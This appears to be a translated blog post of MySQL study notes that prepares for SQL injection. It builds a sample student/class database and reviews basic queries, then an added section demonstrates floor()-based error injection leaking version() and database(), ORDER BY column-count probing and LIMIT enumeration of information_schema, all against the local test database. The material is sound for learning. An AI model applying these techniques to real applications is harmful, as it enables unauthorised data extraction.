0x00 Preface
I hadn't really planned to write about MySQL; basic CRUD is not hard. But a few points are easier to understand when you walk through earlier writers' examples to see how injection actually works, and these notes set up the php+mysql material that follows. The client used here is navicat.
0x01 Creating data to work with
First create a database with any name, say ceshi, then run the following statements in order to create the tables and insert the rows.
Create the student table
create table student(
    id int not null primary key auto_increment,
    name varchar(10) not null,
    age int not null,
    classId int not null
);
Insert rows into student
insert into student(name,age,classId) values("诸葛亮",21,1),("诸葛瑾",25,2),("张飞",30,1),("张辽",32,3),("郭嘉",22,3),("关羽",28,1),("典韦",27,3),("许诸",41,3),("赵云",20,1),("陈宫",32,5),("周瑜",24,2),("陆逊",18,2),("曹仁",33,3),("夏侯渊",32,3);
Create the class table
create table class(
    id int not null primary key auto_increment,
    className varchar(10) not null
);
Insert rows into class
insert into class(className) values("蜀国"),("吴国"),("魏国");
Common SQL statements, mainly to get comfortable with the operators again; some of these I had forgotten. (MySQL comments are -- or #, not //, so the annotated lines below can be pasted as-is.)
select * from student where age>30; -- rows in student where age is greater than 30
select * from student where age>30 and classId=3; -- age greater than 30 AND classId equal to 3
select * from student where age>30 or classId=3; -- age greater than 30 OR classId equal to 3
select * from student where age between 25 and 32; -- between is inclusive on both ends
select * from student where name like "%张%"; -- like pattern match; %xxx% matches any value containing xxx
Common, simple functions
1. floor() error-based injection, as I recall, relies on count(*) and group by
/* If you hit "which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by" (MySQL 5.7+ enables ONLY_FULL_GROUP_BY by default, which rejects selecting non-aggregated columns that are not in the GROUP BY), run the following in the mysql client; it applies to the current session only. Note that the REPLACE only strips the mode when it is followed by a comma in @@sql_mode, which is true for the default setting; if ONLY_FULL_GROUP_BY is the last entry, drop the trailing comma from the pattern. */
SET SESSION sql_mode=(SELECT REPLACE(@@sql_mode,'ONLY_FULL_GROUP_BY,',''));
select * from student group by classId; -- group by groups rows; with only_full_group_by off, which row represents each group is unspecified
select count(*) from student; -- count counts rows
select max(age) from student; -- max returns the largest value
select id,name,classId from student where age=(select max(age) from student); -- nested subquery
2. having filters the aggregated result further; it is used together with group by
select * from student group by classId having age>25; -- age is not aggregated, so this tests an arbitrary row of each group; having max(age)>25 or having count(*)>2 is the deterministic form
3. order by sorts the result set and is useful in SQL injection
select * from student order by age; -- sort by age, ascending by default
select * from student order by age desc; -- desc sorts from largest to smallest
4. the limit clause is likewise useful in SQL injection
limit 0,1 -- the classic offset,count form: start at row 0 and return one row
select * from student order by age asc limit 3,2; -- skip the first 3 rows, return the next 2
select * from student; -- run this in navicat to compare the full table against each result above
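The three pieces above (count(*) with group by, order by, and limit) are the building blocks of the most common injection techniques. What follows is an added example, not part of the original post, that runs each of them the way an attacker would against the ceshi database created in 0x01. It assumes the student table and its rows from above exist and that you are typing into the mysql client; the only names it uses beyond the page are MySQL's built-in version(), database(), rand() and the information_schema.tables view.

```sql
-- Added example: assumes the ceshi database and the student rows from 0x01.
USE ceshi;

-- 1. floor() error-based injection, the principle behind item 1 above.
--    rand(0) is a fixed pseudo-random sequence, so floor(rand(0)*2) yields
--    0,1,1,0,1,1,... for successive rows.  GROUP BY on a key that contains
--    it evaluates the key once to look it up in the temporary table and
--    again to insert it; with three or more rows the second evaluation
--    collides with an existing key and MySQL aborts with ER_DUP_ENTRY
--    (error 1062, "Duplicate entry ... for key ...").  Whatever we concat
--    into the key (here version()) is printed inside that error message,
--    which is the whole point: the error channel leaks the data.
SELECT count(*), concat((SELECT version()), 0x3a, floor(rand(0)*2)) AS x
FROM student
GROUP BY x;

-- Same trick pointed at a different value: the current database name.
-- student has 14 rows, comfortably above the 3-row minimum.
SELECT count(*), concat((SELECT database()), 0x3a, floor(rand(0)*2)) AS x
FROM student
GROUP BY x;

-- 2. ORDER BY as a column-count probe.  Ordering by a column position is
--    legal SQL, so an attacker increments the number until the server
--    raises ER_BAD_FIELD_ERROR (1054, "Unknown column '5' in 'order
--    clause'").  The last position that works is the column count the
--    query returns, which a later UNION SELECT has to match exactly.
SELECT * FROM student ORDER BY 4;   -- student has 4 columns: succeeds
SELECT * FROM student ORDER BY 5;   -- fails: there is no 5th column

-- 3. LIMIT offset,count to pull results one row at a time, the way a
--    UNION-based payload walks table names out of information_schema.
--    ORDER BY makes the walk deterministic; ceshi holds class and student.
SELECT table_name FROM information_schema.tables
WHERE table_schema = 'ceshi' ORDER BY table_name LIMIT 0,1;  -- first table
SELECT table_name FROM information_schema.tables
WHERE table_schema = 'ceshi' ORDER BY table_name LIMIT 1,1;  -- second table
```

The duplicate-key error in step 1 only fires when the table in FROM has at least three rows; against a small target table attackers substitute information_schema.tables (or columns), which is always large enough. With ONLY_FULL_GROUP_BY on, the step 1 queries are still accepted because x is both the grouping key and the only non-aggregated column.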
0x02 Data operations I had partly forgotten
Night has fallen; another silly day.
create database ceshi charset="utf8"; -- create database ceshi with the utf8 character set (in MySQL, utf8 is an alias for the 3-byte utf8mb3; use utf8mb4 if you need full Unicode)
show create database ceshi; -- show the CREATE statement for database ceshi, including its character set
insert into t2(id,name,age) values(3,"小明",20); -- insert one row; assumes a table t2(id,name,age) exists
set names utf8; -- sets the character set of the client connection (character_set_client, _connection and _results), not of the website
select current_time(); -- current time, hh:mm:ss
select now(); -- current date and time, yyyy-mm-dd hh:mm:ss
like "%xxx%" -- matches any value containing xxx; used in where clauses